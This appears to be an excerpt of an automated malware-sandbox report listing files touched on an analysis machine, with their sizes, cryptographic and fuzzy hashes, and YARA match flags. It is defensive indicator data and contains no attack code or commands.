C:\Users\FD1HVy\Videos\tKr\SOffZObMNcI-W_M.mkv 90.19 KB MD5: a41e45e5cf3c708cdff5d62994d5c42c
SHA1: 495b3fa1caadb2ae84ea063abe8522798f17256f
SHA256: f7377ea7609f06b37997ba49c6a0fcfaaa1eaed0a9b4dcc353a0c11b9c73ebfc
SSDeep: 1536:epwp/r7/Z2KETRCcdGzpS58ujjmjXyiYO5gQaifPriY2DNefZ0xZCxXkdBKiJQEB:epwZhTEMcdGl9u/6hByDIfZ0xmUzliEB
False
C:\Users\FD1HVy\Videos\tKr\VCm0_y.mkv 26.73 KB MD5: 3507b59780f9c945e9607ff7524a8302
SHA1: 481a97e313a5ae7606357b45c259838084bf147b
SHA256: 7881d675cfdee8ef6fdbb799c5b6cebff436197930914da1b36372de455c15e2
SSDeep: 768:N+/EYyJhkHp2fLnA/vdGefwk18eSStO/1gZzDq:dHDOOLkdGeok1FSqO/kzDq
False
C:\Users\FD1HVy\Videos\kyLFwyj3y_- AKUbu7HT\1NoZ-i.avi 84.56 KB MD5: 1847c028d89ad83fb07de6685a8aec00
SHA1: eaf76c48a0204d25c53dfbb747a51b754d96a92f
SHA256: ca2643c7ea71bc3afff3b15ca265af6ec20629f8878e02671b9315779493cd10
SSDeep: 1536:05o1tLBcubST43AXvGGCI1WSnfgfzPciS5IILuMhfDIdXMpY1BcH75WgBi:XBckSU3ihX1ZW0iSqIKa0IYPcdc
False
C:\Users\FD1HVy\Videos\Kagr0\BDCHN3cxOVU.avi 81.92 KB MD5: 86cb85d3a194c1340d1907b4a3dfc9c6
SHA1: a19b46889387ba23f8ffcc457b47ad1fee344305
SHA256: ab5c38b84337fdf241718d83727f3cc53ee5f13f7d1b261e0d36f88101d6b2ba
SSDeep: 1536:e6iE8sAKV8zOgP2Up4uL4zZi7Ix9Z+vKQiFnULSNrt4z9VitXwB:LDAKVXgh4uLoZi7IF+vKQWnU+Nryz9Vp
False
C:\Users\FD1HVy\Videos\IGecK\2YT7 9HWKP 1.swf 52.02 KB MD5: 75b84616257e1b9eb52f50d3773a7381
SHA1: ef68dc0408b1cefd2e4b118cf3a1989d67d4b7fe
SHA256: e6dab498c7aa96eeb018991a5df84b14e8a374e8177c80026b3f265d17470c26
SSDeep: 1536:7OBQvIRwYL2pWgAWHfo6BEUuy7WSeGj4JsmN1:7OBQvIv2pWgnHfo6Biy7Wvjr
False
C:\Users\FD1HVy\Videos\IGecK\WwiHK0yV6.flv 42.84 KB MD5: 6d80c106e20b8858c01f7c54675bb76d
SHA1: 21488a16c0b5cfc29926eccb2c57c8fb30cf4a52
SHA256: d1e526e3d6b511e996dbebc4cb4ba2b3a856e448d11cd3d487a2333ad6bf98a2
SSDeep: 768:fQoosXowKsQjrTpdBhi16UQvGcxqxnNgjLQ6EbH1Qs367YpIsEQRw:fI+VQjrTvxUOGaSNfJbVD3SYpIsBRw
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\2SeeX7efa.avi 43.77 KB MD5: d1a72a27141ace08a7020d2911fbebd3
SHA1: 752a0faf36b2156c36b7d552a5aafa67810eb076
SHA256: 680b7ec4c4f649253e29edd5c2afd1734755f2ddbe391fdca70af2c7bee8a203
SSDeep: 768:OLa+2+dEtCW/tLyDY9hFqkaKGV59phss54msJlTaHvmtLzmmvvBfq5j:O2+2+it9/sDYgk259pSmssvOmcvt6
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\Hs7jFAf-QpkayKL1.mp4 98.72 KB MD5: 27ad9de328a241bf5a55f1e5376f1e3b
SHA1: ee1bbc590f37fc21a7a23ce991acb4c2d2875ee8
SHA256: b54097dbcecb5e8bbe8d693e0c3869b1c8098200a6fc1a4974c1b905bb82b10e
SSDeep: 1536:D7DRqzbV/JFOUaulHF4v7bDMSezx520yo/9LoZ97QEIQevWkhkf8ckdmV37/Weoo:fD8dOAHF2gtzxU8ezIvWtqQrFv
False
C:\Users\FD1HVy\Videos\ahcaYgdd_uS\rGivFa1k09POnyHrPjNR.avi 53.41 KB MD5: c424f1007c8c56871ead0ba8b97a645a
SHA1: 1dbf79681bddc4ab4a2fef6c9eb782830be32898
SHA256: 69ed2fd549c78f2969c0e71a383151aac453389cb2e432c1531e9eb39163b3ac
SSDeep: 1536:6iEJcNNLMATOn/OWlmfjtc3RKoTZM9xpqDQ8nvz9Q:9EiNoATOn/OWlmSKoTurSj9Q
False
C:\Users\FD1HVy\Desktop\ids.txt 2.24 KB MD5: 15be24ee2f3365a0f1aee093592c8eb5
SHA1: 8cd4cd6a14b8b405034403b1bbd9b15cf2260685
SHA256: 31765cb1a2eac37e907a69839502c18b6efde9fe9da6d303484f4ebe2f47b54b
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dW4:QZkOi8w0RLVAFptxyRmI3S6QM666j2
False
C:\Users\FD1HVy\Desktop\ids.txt 2.32 KB MD5: 5cee2ca012a122e5adf6be8d2d3eb638
SHA1: 59b97a354d33b0770f9d429d46897179ca5b0de3
SHA256: e25fb87a57a67d43330609f13c69e5d9fe7bbdabacc2cdba0c662a60749227d5
SSDeep: 24:VmZGdHYhOZaw356poyoKw0ToZ08Ut13AFUwIavJyUpTUYdekYdpYdaJmHdkT3dWS:QZkOi8w0RLVAFptxyRmI3S6QM666jI
False
C:\Users\FD1HVy\Pictures\1duD457p.jpg 98.75 KB MD5: 9045adf0c3b9fd395b8575851aaea68c
SHA1: 982b0f398c05ed770998cc5a653f352650462760
SHA256: d58f938f25d4c7f9c0697bf028fcb992aac9cb3c0e0729a33b91e2b755f8554e
SSDeep: 3072:9mbm+vfhcMMHWFNvls1v9Av2961Y+o8LLw:9KmQZNDvla2+2o8L0
False
C:\Users\FD1HVy\Pictures\4JN5OJk27EA8luclUdN4.jpg 46.14 KB MD5: 514c73b27d043808154c65fdbca0abc3
SHA1: 060160c4a02a5b35773bcfd37a276e61927cefa7
SHA256: 8beea1d183618bc14c4003d391af451616f6d0b100027f390462fc0f7bee7c83
SSDeep: 768:fVqlrPzqgaMyfO7mKO2uXulezVLG7Q9IIuL9Yjng5t3vCIFqKLuG3Qih7Ed1jpCP:dIPzqgaoaP2iusk09OBYkvhFeGAnddp+
False
C:\Users\FD1HVy\Pictures\7snkBq.bmp 22.77 KB MD5: 1adf6f7764f53151762d4fd9af035962
SHA1: 164fe6bc6a30c54afdaf0c77505e7100ee9ad122
SHA256: 94948c51d02e2e9f1c0b63295a35b07629b8d9ad846b8e0119466011e4974947
SSDeep: 384:TM+/9lqP/ktAWqOyGzvT/323GJ1Jzb5qaQCIIb78e8OZswkONbHD8Ov:TGObvTsI1Jzlq5CIUCOswkcTv
False
C:\Users\FD1HVy\Pictures\7V2nOIAHdw9cQ.bmp 68.22 KB MD5: 2b15e5567dede3e84ff37099523a355a
SHA1: a07ca96cc6f7bb2a60e33221a92dddd3e49d408b
SHA256: db3ed41f01316d737cc0bc9c0480ff823f961da0c5975b31da20d9a58ffe6e5e
SSDeep: 1536:ZqFeP4BMi5DBC3hsNX5jZCCuOf4nICx/aQPDhS3ao:ZJwB9DBCxsNX5Nv1fzC5PPD1o
False
C:\Users\FD1HVy\Pictures\Ce1PVVjhKneKv.jpg 25.62 KB MD5: 47457e64f2ed5077d0a2c33d47e9a8a0
SHA1: de69962b364fd549db03c1f469aecfcfd92883b5
SHA256: ed08cecb5b7a4008eb9bd141b1b169ba33f61150cabd9b95d3488043f436497f
SSDeep: 384:pqRwexM2c10lxQTxq9A0Ir2nIggUgjit5NJ1+1WZMADdHyjQSyFYGNdrKRFMZvO:IbxxoIKxqnISnIIki5gWZMARB7Zo
False
C:\Users\FD1HVy\Pictures\D tDC8K.jpg 70.62 KB MD5: d6e804ebf485d925d538c282c5d97016
SHA1: 7faf24133385dbe85b6222662192e72f052238a9
SHA256: 2ad1597f14c14f7dbea9dd97a8c2277933942b8aa50a165b62903fabc38c4a72
SSDeep: 1536:EYGUfKZVBai9LND71C4dhU+ZN0UQg5lnEmky3t22zqvtakSYMRl7Cl:KUfKZOif7ddPJE/y3nzqUkSX7Cl
False
C:\Users\FD1HVy\Pictures\Ir5ZI.bmp 29.03 KB MD5: b91e66128642d3ad6439a43fb232104c
SHA1: e0da0084436dd7d86edf4ac4daed887a83857620
SHA256: cc28f604ae012b2abd8ed1525216ec8d0eca30feddc81514c3a8f2509ff8db36
SSDeep: 384:uAy6R/bzDLsw/MciSUedef/k65InlOxCW8b+5vDTZxiu23Bx0jngJlc3IGFDbztH:hR/bzDVMv//5IZVyPo/Run33JztH
False
C:\Users\FD1HVy\Pictures\jpJ811wuLbp.bmp 24.45 KB MD5: 46f7d57fd4eacb9d2a51825f3186ea44
SHA1: 6e7377b0b975696d4e6399477195cd878f40ca7e
SHA256: a02a7048234c3dbb3ac1344dcdcd262a221cca5abe6497e88020827ba1ac8250
SSDeep: 768:FQhNX1/Xw506j5y8sVMFHiVZoQLxdQlyKmb:FsX800Zy+iVZ/Xb
False
C:\Users\FD1HVy\Pictures\Y0AydhkNNUR2.jpg 21.14 KB MD5: 46f958beaa08031e1f81ccd607f7a956
SHA1: b973189ee378d52e6a75de8b7de3b5bd11833c63
SHA256: a630293fdb2c0d6ecaeda9b6355ff6ecf19fbd897e3f3c35f9e982c62755ea3e
SSDeep: 384:eQXJY4X22Cf/EvMeDAauPs67z1kwQ3l0m20bv/Tqgy+1Y9Xp/0AW9AJ8gdmmYk:eQXe8Cf/EvMta897z1y3lQi/TqgIXp/V
False
C:\Users\FD1HVy\Pictures\YGhL_kMC_eqFIP.gif 74.05 KB MD5: 755146f87d310f67426320d952cb42fe
SHA1: 2e98ce8df9fe5407dfc9fcf55642308cb685c032
SHA256: 64b7b91411586b74d07e4151b6fcaf6d78c139b4fdecbffa65bc390c1283dad6
SSDeep: 1536:u7VrhDtrgUI9buTCtSUK87XpGhXhmPgTqfksf+AdfWpdZ:u/D5RIKCtSUK87XUhcPgufkI5dfWpdZ
False
C:\Users\FD1HVy\Music\5oW38z-l_J.m4a 20.81 KB MD5: aa4bd9a84baa5d360021b5a8301e7433
SHA1: 2864c6eb1446d1cd87e393d5c0495186f43a6ba7
SHA256: 46537c541ab5d18c9c623c026fe83dd4a44545f6a0626a32d3d52e49dd24c810
SSDeep: 384:LDdevVsbURjtVFkO7nV0hY1M+Z/m3yvO7XnDuXu/YT2rnWAxDz/gTyqv:cvVswUO7V0KReaOrn6ebW6jqv
False
C:\Users\FD1HVy\Music\J42Z.mp3 68.67 KB MD5: cc9a681d985d4844355ecaeb1b290b87
SHA1: c435c30a8dd4d8c17ac3354827adeb25465a96ac
SHA256: 49c72c292be74926656072052116b0c861a4c4669f22fc4e5584012a8d7fb494
SSDeep: 1536:XRmVVy891BjIjMn2lTMQ6k2R075VLfr1pIfyIW1LjDs8gPU+keOwnBA0:cVVy6DMvlT/5VLfr1pIfyI6+keOx0
False
C:\Users\FD1HVy\Music\_Z19.mp3 69.97 KB MD5: 822a538b165a505bfafdaaa09a7fb1f0
SHA1: 53d41956d69c60ec9d5cf25aa99a8ef89e0f2870
SHA256: fdcefb2e1fa08dcc60bbaa07f4c08886976f0de4216dc5a11976f0ce26077426
SSDeep: 1536:BrAqsZpXXDzr84v0s/z/0x6NoW67H1z1EpZUmoeCM:mhRXnr8NsYxgot1ziTVV
False
C:\Users\FD1HVy\Music\Ps7z1Y\DFuSzaknIrmv.wav 60.11 KB MD5: 19c816337abc5b1b3838628b9002b9c3
SHA1: 63009f4f3e9ef75efb392ab62cc4cf1c47f9c429
SHA256: 48dc0bea7200e7a40d91e2a72081da011187419c2ade351389ed13dd65736155
SSDeep: 768:GDsh6CXzlkXkDjcARQ60qt2WQ/qekYlNoHEgEom99Cw/T6bN+fLBdWgY+YtZx+i8:AslXz+0DgAMqBuIEoYqRSBd+tvx+NPWO
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\VF2Fp5QeqqLYfl8gl.m4a 42.58 KB MD5: 521c7357e53dc1196baeb9f3eb7677e0
SHA1: 23f92561e805820f0212c47a4e947ce2b67d11a1
SHA256: 8a535466085edcf3a888292bc9db00c63c4be0c01d62d65cd9fbce5e3ab60a60
SSDeep: 768:ENCmZ5+VV2Sa/H2YwZMh1E0aXbXBbRid6paFjtlLMt8fGdjQD9eg3dmV3E8muTIu:VNVP+3wFxXrBbRidcarlLMSf+2AokVU4
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\ahtik 3dEIDK LesPgbT.mp3 67.27 KB MD5: bbeee4d4e089bb6b101a25590cc4a3e7
SHA1: 93e4582f48c5ae9e694161de3281738f7660794b
SHA256: b75b72c26e5d8f769dd6cc448dd3edaf291bf229b7719601bad5c924828ac5ae
SSDeep: 1536:Q+lEKkOZgm+x9bowyNj24pVxVEcdUxUfd5W6eKhmSk:eV7mpbjLxycdUxUfd55C
False
C:\Users\FD1HVy\Music\Ps7z1Y\W29iTxeG\mLo6a3P6q3fcpY\oJFUvhouKderw.m4a 58.22 KB MD5: 5272d20558e61c0c24276e6b87a4e216
SHA1: 8e44b3972e0e9096f6583157362ad11dcc1c96b7
SHA256: 6d4de9de5a70e16c4cab322ac7fa5e5d9e60aba4ea98d8419e5d8b061e9a9c2b
SSDeep: 768:Z4BJBWIgVTOXRWzheztcWUM+6GCj1+Z/1esIbhKjM/g8Tm7be3ZGakC4ct:ZcHWzT0ztbUB6V86hhKjM/7PZGaT7
False
C:\Users\FD1HVy\Music\Ps7z1Y\Hg6ypigpHsR-XRiGigP\SiPc-hdOB.mp3 64.58 KB MD5: 44390fa401217effd2ef2f3249f3f14a
SHA1: f8604caac61912983ed0a72c80db2882fd18e2d7
SHA256: 79c68e47e7dcc4cc1131f89d41ea44e5d2d29ec5147f12a0dae56e508a127edc
SSDeep: 1536:LFB4/U+kHmc7d5uwbHOOBd7czLmE5kohD8UOQ9eBSN:Q/BkBPuOH7czLmzoheQ9eBA
False
C:\Users\FD1HVy\Music\Ps7z1Y\0S8C98Izi8QyG\G_JtWgQVBTJ7M2pd_.m4a 18.77 KB MD5: 42def0427dbe41f4f92d1c3110be3719
SHA1: f56afdd3c40466748599b5bb108603e4ed3aca06
SHA256: b4acf999dca52aa5e9e9c277d88512c92c7c5d7b58831c8d49588d9dc350afc2
SSDeep: 384:KS5kOtsmVZvifIQzz+u3kkk4jfYfDbt8HtneMQx8Yv4cJ9E8xGSFfY:KJ2VaZn/3dkUfYv+Htetb4cfEgGSq
False
C:\Users\FD1HVy\Music\MK kMG3hBIR2Rc1-7xXp\dhAbWJ5UgoBr80.wav 9.11 KB MD5: 3b6397a69f3f3fa8a0c508dcfa4c23a7
SHA1: 588b1a1046f1f765d983208cf8971c95b6238477
SHA256: 85a4fcedc1d925ccd869f9dbb9e3f2d43736a7d15e5e0e8fafd4882dcd65822a
SSDeep: 192:1fR1g/GGj1qWFytMBkasHWyavs7ABwELRm9S5PvxMflzW575TTdWY00VMlf:n1ZdnWhtm9Sby8RTS0+
False
C:\Users\FD1HVy\Music\ddgoRP\3faLNgmV.wav 92.88 KB MD5: 9acfd2c5d9e88886f81b2b330c8261be
SHA1: 654ce8606288ec72ae4df847209a9b19685df488
SHA256: f4d781fae87964381635149c4d5c2ccee3950450c302b3766177def3ebbf937e
SSDeep: 1536:52HIIV1qvQE3uC/9B/UJ8rtyMzHmEPHltWxoWTzM8WtE1wRxO2JI3t8Jbn7JHX:EoC1cpuCf/U4tyEmqaTQ/tEaRxrEu7pX
False
C:\Users\FD1HVy\Music\ddgoRP\nMGREfCTbmqLn8Nm.wav 22.70 KB MD5: 5858e73016aa792c4f300ca5e2bd8f1c
SHA1: a8a8a233ce301672f69e9f2ff746292ed1867827
SHA256: caded0eaeda3eeeea42b4791372287e6645eaced8255262e86dbacab9f5a6037
SSDeep: 384:oMu9wEvojOND5iF1+YeEEIFZmj+NPpbfx/AHud5Y18IS+Wmjf6xYQGgneAS:Hu2EvoFn+3qFQjSxfJAHu5Y1v3WmjpQk
False
C:\Users\FD1HVy\Favorites\Bing.url 976 bytes MD5: bad99fd16c77c9cda31b4e6b42162487
SHA1: a6c0762bd00c8817ddca8c54da0238019fbd1c03
SHA256: d64687d391d8d9398ea6bb490ebfcda70b5a191c2cfbbbca299f3880fbc6fd8f
SSDeep: 24:H+aVYG2hlfaLJFoIhD7UmOt3W9+93LnszrS8GPXf:e3b0vvhnHM7Nvf
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js 1.22 MB MD5: 055ca7ebb18e13e34032754e8075b68d
SHA1: 4a45b3bc48db559b91a0e3bfa60fef8dbdd14049
SHA256: a86143c5a87ff7727a9586de927b95ce4671f4f613f261a5ae448afedf85dbff
SSDeep: 24576:ubRf97WM1xAYOFVWocsoNlqMio8qjJMrFKxb24PRP5rEzCv3HbF1CJvUgt3:u5tWM/AYGVWnNWfqjKrg245PZEg37oV
True
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js 2.91 MB MD5: 87f26cf7db700f86de6a4f9cf02d4e54
SHA1: b5771dca693a5c3f0b184c87d985faeaa4d6537a
SHA256: 199ade7a0e76e1b8c964f2f8468098ad124b9e0f594c22fdde8266bd0c639eea
SSDeep: 49152:ktccXuyKGn8y0btRe4Ycp53BAyywEzG8WWEIHYgFQAorRDVLrfT:8c2dKgOzNp532aOHYgFCVx
True
C:\BOOTNXT 784 bytes MD5: 4d416c18fd345bcbebf2cedffd906d18
SHA1: 936879f1c04b2e4eaa792c81c9ce5e85faca26fd
SHA256: 627647114060847246a5f9c8089190307d59e1efaa6aa37da0e2287b318ec6c9
SSDeep: 24:PILljr6Qhbv2runUmOt3W9+93LnszrS8GPXf:PINrHbgunHM7Nvf
False
C:\Windows10Upgrade\DW20.EXE 629.45 KB MD5: 5ad30920efffe36e0baf1db5b9b9e923
SHA1: eeb9d0c95a8267b8146367c5f80a4bcd6380fad0
SHA256: 30671d825245872dea4c6a9d1190a4a53b200e10b2ceab71f26ae3cdfbd2ecb3
SSDeep: 12288:GYOOkWJLYFPVv9UM+N962Scht7aMci/P/e5GolvtlwvtDNciRG:GPjWJLYFt9McYnaMElllwvtLA
False
C:\Windows10Upgrade\EnableWiFiTracing.cmd 10.34 KB MD5: 4c6eb227eeb4809b10fa6036b4c56cd9
SHA1: 9e23f6c52e6a125d7c5249864da51abafe0e24ae
SHA256: 109a092e4d62356d208e6e26e95982a9caee4d99c30781f10fd2a47083fe3a78
SSDeep: 192:O/6h1h9K9/V55JNd5Ky+l8sZ3EmWBbYiFJHhZFXomZlRMlf:OchA9/V5jp+SUEnbrhfomG
False
C:\Windows10Upgrade\GetCurrentRollback.EXE 72.45 KB MD5: c235e1e30d0e1068b3cfea9ac863e900
SHA1: 08b61eac3849da24191d10f426a67c546687af83
SHA256: ba6639b1f11c58f74d88cf46cded45b3d6be03d3fde47975630746575411eee4
SSDeep: 1536:Kp9dJ4eNa3bniWVSQMqG4W1v+dunztVAPgGrBG3WTjDmVHEK:Kta3DFYSWAQfAPgGrBHTjDmGK
False
C:\Windows10Upgrade\Windows10UpgraderApp.exe 1.35 MB MD5: fe88d94cf0c137cdd05bd35c92179233
SHA1: 1720ce68232f0c2b954a1a69ea2a98a80abc6f30
SHA256: 2274b158e0c389fffe435cd8f407ae1271f0ed0006dde368ca261685df271e7d
SSDeep: 24576:w8UI/dzOi3TzIFRQHVqHcVmQclXH2SnX6uXVbIpPu5qFBr7C8HrYUCf:wUOi3TzIFRQHVqHcIQCXH21u52RIf
False
C:\Windows10Upgrade\resources\hwcompatShared.txt 806.78 KB MD5: fea3f4927a54eb28e4c24b39f7385c74
SHA1: 038a2f01d7fa8f3719446452ec58fc5c95c76aa7
SHA256: f3db1ad775a24e7b0738e9e6c66d5b65805ebd856cd0b9d7dfec54c6bf14b64c
SSDeep: 24576:BHNm18kniVzqBiv75RVP4QYkZIJzBeoCdoXYb1i35zNYD:BH4hniVzqmz54hkIHeHdoXp3BSD
False
C:\Windows10Upgrade\resources\ux\block.png 1.66 KB MD5: 48eb2a854a995ba2d9ef3ff15c4307df
SHA1: c79fff2c7cf82ccf3ac1af055ca47e4bf47ce144
SHA256: 15d677594b9fd2225a99c5be949ae871b46a4b94ca6714fc0003712f8f51d3f2
SSDeep: 24:n39Qip8tfPurJ2v2qSNR2Sw5/VVparRJ3AgOR9Qw7W8b8rWXNFUmOt3W9+93Lnsm:3G9tfuFxWW/AgOv68b6WXNFHM7Nvf
False
C:\Windows10Upgrade\resources\ux\bluelogo.png 7.67 KB MD5: 60dcbfac430057bff744fcc34fb1e842
SHA1: f178a95e18c6485c2a218c0780d839d6dfc1b231
SHA256: 4043813dc9e26dc85e1bb459ff9ae6982c540afc32f634a3a44efdff547b5b28
SSDeep: 192:h5CBtjM12WFxdjmoZ1ZvLaydUhNqgcdXZtf88OXOqz0i44Mlf:h8nQ92oZ1dHdULyXzf88cpzL6
False
C:\Windows10Upgrade\resources\ux\bullet.png 992 bytes MD5: 2dc6c610854e55c4c9b4c672a91b6652
SHA1: 677653026a4db08f9e7fef337470c10b3d0d0536
SHA256: 5e5a94b6496025b59b1c7f6e4f8cacbb413ce4ecf65a10ee376ee6be987a2bfe
SSDeep: 24:SKPkiVvcBZLxJqZjLmxxKHPKbUmOt3W9+93LnszrS8GPXf:SKMiVQWZXKxKmHM7Nvf
False
C:\Windows10Upgrade\resources\ux\default.css 6.39 KB MD5: 583cc5d7a7b381fefdbd62115948bcfb
SHA1: 490076ae82b8491da4653def84d745f99efe63d1
SHA256: e7c90308e19c93de538f8a2b0a14fbd79a9447c84578622f80c0e70ee380f842
SSDeep: 96:VAlcIC8sLtbjGLsThzELVW9EDpuY4O0VXZT2Qgs6sDRaKjd0gGoBq2HiM7Nvf:VkwtH1ThYJCopuzBssnRaKvzCMlf
False
C:\Windows10Upgrade\resources\ux\default.htm 61.83 KB MD5: fe1a88e96e6aafc0d55e00f5c94e8f72
SHA1: bc80ba4bc8f18fa6b622b075625ee8af6d1e370e
SHA256: df7a3b54e721b96966922d8ee99daa0e3708c20a4a4f2235420af4dfd31c053d
SSDeep: 1536:VUzafpUqG+ToFZHhW89X1bzYS3yVDqF2ZFPv1IUivD9c2Dxzu:Vm+xFTytbzTuqaPtI7vDFxzu
False
C:\Windows10Upgrade\resources\ux\default_eos.htm 55.31 KB MD5: 5b42ce64d19335afb9ea02aa3a4b9b33
SHA1: 779c08438e2bb4cdcaed01773b73d6e88e963673
SHA256: 42f580f123e7fa954640e311a6d4740bf734eb8517a7f5105e0ab2dfef219f47
SSDeep: 1536:hLhQrIknpJge6rYuSZvE0D6hfEosWRsT4Ccm:dhXQOrRSpE0D6hst6D/m
False
C:\Windows10Upgrade\resources\ux\default_oobe.htm 64.92 KB MD5: aae603f58233d77a86457eb7e3188494
SHA1: 1097e26fdd9c5d06eb3c4748317dafad56aec72c
SHA256: f30fff6dbe36cf3599bffd4ed11be359b05bf5cf16dbfd6fd39bd524b541cdf4
SSDeep: 1536:XpZRtuAq+Pj6ZD3qNyJJSvUeorjhQmJ9V73ZT4CSyXh:ZZr8+Pj6B3zJJHe2jGmB9T418h
False
C:\Windows10Upgrade\resources\ux\eula.css 864 bytes MD5: 56ca9bd9a8389496f473f53e94bda21b
SHA1: b0248052852789abc1b7e797fbd82d2b1b1d72e5
SHA256: 7b490cee869f8b435f9c2255176d0e6f6f90cecf58488e6b293a93b02c6152a5
SSDeep: 24:nrQlhYLhA0bDUmOt3W9+93LnszrS8GPXf:nrQLYH3HM7Nvf
False
C:\Windows10Upgrade\resources\ux\GetStarted.png 4.48 KB MD5: f9778909ed5d5cf7312772b32b81f638
SHA1: 88a1e6c495b06c45cddd6fb23cfab0252cbe0d7e
SHA256: 1e2eb6a603ad28a3351323304cd0378b8f99c6e0bd9b4039f798120cbf5859e6
SSDeep: 96:cfRgqgrA07G1lRO2RQMl1MYwOHXCIeEOmE2kx/i7M7Nvf:cf+k0SjhRQMJTteJN/i7Mlf
False
C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png 4.73 KB MD5: 3814b922a7fe95fa54ee0df474c159c7
SHA1: 39b7d14333925e54dfb7b86666f145856f68630f
SHA256: 89cbef73912d0340e6ed4814acf86c0fb65c69eab1b755b97d7c5d5b64eb3915
SSDeep: 96:MKawWJldbBnFJrhKugRRlBFWdamkdm12ub6djLpt7fHAoAap+M7Nvf:MXwUfVnFJdi3BccmkE16pVVWa8Mlf
False
C:\Windows10Upgrade\resources\ux\loading.gif 17.75 KB MD5: 2880863b57ec4f20b2774feb9cf11c99
SHA1: 5dc22e0ef21413b87b1dec8b4d4f1a6bbf377c53
SHA256: 8527069927f421b8391c50065c7d2e5be478f6a28d18eb2365111d0012c2753f
SSDeep: 384:dMQXihuuAOv51oq47P5OU/Zi7VoJXhTPHgvqcEFHSzhI4Y2A58e:t54R1oq47xTRiRmxjHgicEEip2A5p
False
C:\Windows10Upgrade\resources\ux\logo.png 3.31 KB MD5: e2f9790777c66236a7b39ce2a29d2ad5
SHA1: 810058946dd451b767894c564030dc88c45a61d5
SHA256: 80fd0886f55bb5c1f44b6bad58a697244c0cdf04d1c637973a3d900522c8248e
SSDeep: 96:esxTcsisk3ihsRkn3CEB/hFFdFuMUK6IqPy2XM7Nvf:aEhsynppFRYPVXMlf
False
C:\Windows10Upgrade\resources\ux\marketing.png 1.23 KB MD5: fe067f26e12f1f872361c493e8f63b88
SHA1: a14d7d7f473dd7156fe6e9ee1d979f27321cd11b
SHA256: 82f00d7282ee809bd30b825e0c2688a8eb40f90c1c12e8a66a0cf64cd6cbb2fb
SSDeep: 24:aETaR/AWa0N488kqhb/rw15psUmOt3W9+93LnszrS8GPXf:FaiWa0Jqh/i+HM7Nvf
False
C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht 608.27 KB MD5: 657c65f3c77a24950ff99efc89770af6
SHA1: b8a70c331dbe41bfdcd45a45cf34bbf699f72ef7
SHA256: eb27fc9506d8390a7c38d1f12888e722ee5e7b720abeb593fed648f13c8adda9
SSDeep: 12288:7p9BytBaHJUATKhyr3Vr0i6GeVYrWECrQuajuGX8CbXrPy1C42miEnM:7pPykHJDi03VSGeDECr/ajuabXrPy1Mx
False
C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png 2.92 KB MD5: a3bcfc82cb917079283e6013c4e0cb84
SHA1: acd92223afc44c4ecaa792bb868a246d2197f8f5
SHA256: 85cc45062a053ca8fc23e737b7cb4ec93513d8bd6294ecfe4c93d051098d2857
SSDeep: 48:rgbka8HAodk6z6zJMEXJ0iNGc7OKzoECVlmavJmetNGtVNHM7Nvf:rq+6zJMgJ0iNGybBGU3bM7Nvf
False
C:\Windows10Upgrade\resources\i386\BiosBlocks.xml 90.25 KB MD5: 2fc363177b38064fb508e045d5138431
SHA1: 7001525c52f37148b83765cf8f41ac255366f722
SHA256: 8bc90a5e9fb17e3ee56862c268b294de7cc68ef889f161b2913e4730f7f777b5
SSDeep: 1536:lyhx4xXjPr7CsRA33e/uiRZEhkCopeeedkf0KqtSLspKvBNoGNJFJUseJZMVKqrm:lycisili8hHoceedpxtssKoGTFJXePOS
False
C:\Windows10Upgrade\resources\i386\hwcompat.txt 16.88 KB MD5: 87ec29ff89d3f5b4647931a713df70c6
SHA1: 0ac823f5b5552153f2bec1032798ffd451cf7f59
SHA256: b3980a945f0e52f066e8d8003cdf86a4aab99c86eae11ea54069b060807c4833
SSDeep: 384:qsIQgme0CUuDR8cM3Est5YVFc18WmclvfPgF:qsI1PDWcNUYVF9cdQF
False
C:\Windows10Upgrade\resources\i386\hwexclude.txt 2.97 KB MD5: 32cb7baff922151966309455b74f7717
SHA1: 36f83b124db2183c1a6727895ec749b5962c1957
SHA256: 4cbaeae4febd98c6f35e5eacc1a150119e60c32528126c812c74813a5fb91c84
SSDeep: 48:vA94/N180JDi8TpOldJGXFRvrCNXUsl7elbk6/qrly+mHM7Nvf:vfo8YlKRjCOsl7pOqrlPYM7Nvf
False
C:\Windows10Upgrade\resources\i386\nxquery.cat 10.39 KB MD5: 2e43358f8babb960050c872ce2ac95ee
SHA1: 1d700fe4e307d88670ae28af74c7c442911db012
SHA256: be03b2df0aed86a95d40bf507e9dad26c4f76d26dab42b9caeca5faa9c437f5b
SSDeep: 192:dXGuONLI+dQeDD/M6A6xUS5DZOyAWIk5CMaUD2lMCMeqf5n5rJCc5D+8Mlf:dSVQ4D/9AkpZOyAWIkLaXlJvkn5rV8
False
C:\Windows10Upgrade\resources\i386\nxquery.inf 2.22 KB MD5: bd4a38de6c8c8f63d1ca527c542710bf
SHA1: 47ee2732f0f81d4533c6d067f1b1f62f17e5ef09
SHA256: 476f013e67624aea1b312edee287f5160f9217383d723cd5602ab7d02056ad57
SSDeep: 48:qZhZNJ8770iLf1G82Hqxl2ZDbsMZA6ubppiPQHM7Nvf:qFTiT1juqxl2pdbsppnM7Nvf
False
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css 40.75 KB MD5: accc0f71ec8ec91570b04ec8d1bca633
SHA1: 3e9b6c5db75b062f08cc91519620d4e0bbeae3d4
SHA256: 6953349e67f10a291fa8a0126d6d7184f2c4db19c71655e158418b2aead05039
SSDeep: 768:F8Br2N1ukFMRhXagIj4oMrB1q0DzARaH2e3u1Ig+1t3fmjUyUt+gaVMFU:2Br2rukFMzQCDq0weYIrzPmjS+gaVMFU
False
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css 263.61 KB MD5: 69d8edd486c778a58bcf9a753a7bb39f
SHA1: cbf9b9223afbd0946b3a33883368d60b24e8ad8c
